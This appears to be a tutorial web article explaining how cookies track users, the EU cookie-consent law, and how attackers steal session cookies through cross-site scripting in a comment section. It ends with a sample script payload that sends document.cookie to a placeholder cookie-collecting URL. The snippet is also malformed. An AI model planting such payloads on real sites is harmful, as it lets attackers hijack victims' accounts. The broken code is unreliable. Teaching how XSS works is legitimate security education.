Open In App

We use cookies to ensure you have the best browsing experience on our website. By using our site, you acknowledge that you have read and understood our Cookie Policy & Privacy Policy

Cookie Tracking and Stealing using Cross-Site Scripting

How are cookies used in a website 

A cookie is a randomly generated alphanumeric string that is generated when you visit a webpage and is sent to your browser by that webpage to be kept as a record of your presence on that website so that you can be recognized by that site when you visit it again because of your previous session(known as a session ID). But that’s not the only purpose of cookies they are also extensively used to keep a track of your preferences online and they travel from one server to another and can be intercepted and stolen quite easily. This article discusses how cookies move around the web and how they can be stolen.



The Cookie Trail

As stated earlier, when we request a webpage to a server the server contacts that site and renders the webpage to our local machine. While rendering the webpage which is mostly HTML, CSS & some JavaScript along with that it also sends a cookie(1st party cookie) that identifies the session. Besides the website, when we visit a webpage we often see a lot of adverts. These ads are not actually part of that website but are being supplied from different servers around the world to the website in exchange for money. Whenever we click one of these ads, it sends back a cookie to its respective server, and the server stores it to keep a track of our preferences. The servers also communicate with each other and they form an advertising network, sharing your preferences and showing you ads according to those preferences in the future. So you are being tracked and watched by multiple entities online all the time unknowingly. Keeping this in mind the EU Directive passed something known as “The Cookie Law” according to which the site has to ask for your permission to use cookies. This is why you see a message on a certain site like “This site uses cookies to enhance user experience……” asking for your permission. The Cookie Law is a piece of privacy legislation that requires websites to get consent from visitors to store or retrieve any information on a computer, smartphone, or tablet. It was designed to protect online privacy, by making consumers aware of how information about them is collected and used online, and giving them a choice to allow it or not.



Cookie Theft

Shopping preferences might not classify as sensitive information about an individual but online shopping carts and banking details are really sensitive data and all of this is also remembered by a site with the help of session cookies. If an attacker manages to get a hold of your session cookies then that person will be able to pose as you and that site and will have access to your banking details and your amazon shopping cart and might order stuff from your amazon account to his/her address spending all your money. This generally happens when the site has a vulnerability and the attacker uses something known as cross-site scripting (XSS) to exploit that vulnerability. This is found mostly in badly-coded websites where the developer forgets to include certain security measures to prevent an attacker from running a cross-site script.

How do websites use XSS to steal cookies?

I’m going to explain this with a hypothetical scenario. So let’s say we visit one such vulnerable site which has a comments section on it. Now on an ideal, secure website, a comment section should only have text in plain English but on an unsecured site, if we post a code in the comment section the site would think that it is some code from the server side and it is supposed to run that code. 




<script>   
    console.log('<img src="http://localhost/submitcookie.php? cookie ='
    + escape(document.cookie) + '" />);
</script>
 





                        











Related Article: 


  
	

        Article Tags : 
        

            Misc        


	


      

      

          
Recommended Articles

      

      

          
          
1. How to add Site Header, Site Title, Index Title in a Django Project?

          
2. Tracking bird migration using Python-3

          
3. Project Idea | Ward Tracking System

          
4. GeeksForGeeks On-Site Programming Contest at MIT, Anna University - March 2018

          
5. Oracle Interview Experience | Set 48 (On-Site for Server Technology)

          
6. Basics of Batch Scripting

          
7. Introduction to Cross Platform Mobile Application Development

          
8. Puzzle | (Help the Women,  Cross the River)

          
9. Number of jumps for a thief to cross walls

          
10. Decimal to Binary using recursion and without using power operator

          
11. Rendering a Triangle using OpenGL(using Shaders)

          
12. Addition and Subtraction of Matrix using pthreads

          
13. Message encryption and decryption using UDP server

          
14. SQL using Python and SQLite | Set 2

          
15. Python program to count upper and lower case characters without using inbuilt functions

          
16. How to visualize selection and insertion sort using Tkinter in Python?

          
17. How to add Image to MySql database using Servlet and JDBC

          
18. Different Ways to Generate String by using Characters and Numbers in Java

          
19. Minimum number of sum and modulo operations using given numbers to reach target

          
20. Unreachable statement using final and non-final variable in Java

          
21. Python | Working with date and time using Pandas

          
22. Mouse and keyboard automation using Python

          
23. Erosion and Dilation of images using OpenCV in python

          
24. Reading and Generating QR codes in Python using QRtools

          
25. Operations on Audio/Video files using ffmpeg, avconv, and youtube-dl